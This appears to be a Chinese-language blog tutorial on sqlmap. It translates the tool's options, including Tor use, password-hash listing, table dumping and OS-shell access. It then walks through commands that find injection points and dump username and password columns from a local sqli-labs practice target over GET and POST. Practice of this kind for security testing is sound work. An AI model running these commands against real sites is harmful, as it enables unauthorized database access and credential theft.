sqlmap的使用方法

2020-07-29 15:39:51 浏览数 (1)

SQLmap的使用

参数

目标:至少要选中一个参数 -u URL, --url=URL 目标为 URL (例如. “http://www.site.com/vuln.php?id=1”) -g GOOGLEDORK 将谷歌dork的结果作为目标url 请求: 这些选项可用于指定如何连接到目标URL –data=DATA 数据字符串通过POST发送 –cookie=COOKIE HTTP Cookie的值 –random-agent 随机选择 HTTP User-Agent 头的值 –proxy=PROXY 使用代理去连接目标URL –tor 使用匿名网络 –check-tor 检查Tor是否正确使用 注入: 这些选项可用于指定要测试哪些参数,提供自定义注入负载和可选篡改脚本 -p TESTPARAMETER 可测试的参数 –dbms=DBMS 将后端DBMS强制到此值 检测: 这些选项可用于定制检测阶段 –level=LEVEL 执行的测试级别(1-5, 默认 1) –risk=RISK 执行测试的风险 (1-3, 默认 1) 技术: 这些选项可用于调整特定SQL注入的测试的技术 –technique=TECH SQL注入技术选择 (默认 “BEUSTQ”) 枚举: T这些选项可用于枚举后端数据库管理系统的信息、结构和数据表。此外,还可以运行自己的SQL语句 -a, --all 检索全部 -b, --banner 检索 banner –current-user 检索当前用户 –current-db 检索当前数据库 –passwords 列出用户密码的hash值 –tables 列出表 –columns 列出字段 –schema 列出DBMS schema –dump Dump DBMS数据库表的条目 –dump-all Dump 所有DBMS数据库表的条目 -D DB 指定数据库 -T TBL 指定表 -C COL 指定字段 操作系统访问: 这些选项可用于访问后端数据库管理系统底层操作系统 –os-shell 提示为交互式操作系统shell –os-pwn 提示为OOB外壳,Meterpreter或VNC 通用: 这些选项可用于设置一些通用的工作参数 –batch 永远不要要求用户输入,使用默认行为 –flush-session 刷新当前目标的会话文件 杂项: –sqlmap-shell 提示输入交互式sqlmap shell –wizard 初学者的简单向导界面

用于MySQL注入
GET类型
查找是否有注入点

python2 sqlmap.py -u http://192.168.232.128/sqllabs/Less-5/?id=1 --batch

查找数据库

python2 sqlmap.py -u http://192.168.232.128/sqllabs/Less-5/?id=1 --dbs --batch

查找当前数据库

python2 sqlmap.py -u http://192.168.232.128/sqllabs/Less-5/?id=1 --current-db --batch

查找表

python2 sqlmap.py -u http://192.168.232.128/sqllabs/Less-5/?id=1 -D sql --tables --batch

查找表中的列(字段)

python2 sqlmap.py -u http://192.168.232.128/sqllabs/Less-5/?id=1 -D sql -T users --columns --batch

查找字段中的数据

python2 sqlmap.py -u http://192.168.232.128/sqllabs/Less-5/?id=1 -D sql -T users -C"password,username" --dump --batch

POST类型
查找是否有注入点

python2 sqlmap.py -u http://192.168.232.128/sqllabs/Less-11/ --forms --batch

查找数据库

python2 sqlmap.py -u http://192.168.232.128/sqllabs/Less-11/ --forms --dbs --batch

查找当前数据库

python2 sqlmap.py -u http://192.168.232.128/sqllabs/Less-11/ --forms --current-db --batch

查找表

python2 sqlmap.py -u http://192.168.232.128/sqllabs/Less-11/ --forms -D sql --tables --batch

查找表中的列(字段)

python2 sqlmap.py -u http://192.168.232.128/sqllabs/Less-11/ --forms -D sql -T users --columns --batch

查找字段中的数据

python2 sqlmap.py -u http://192.168.232.128/sqllabs/Less-11/ --forms -D sql -T users -C"password,username" --dump --batch

0 人点赞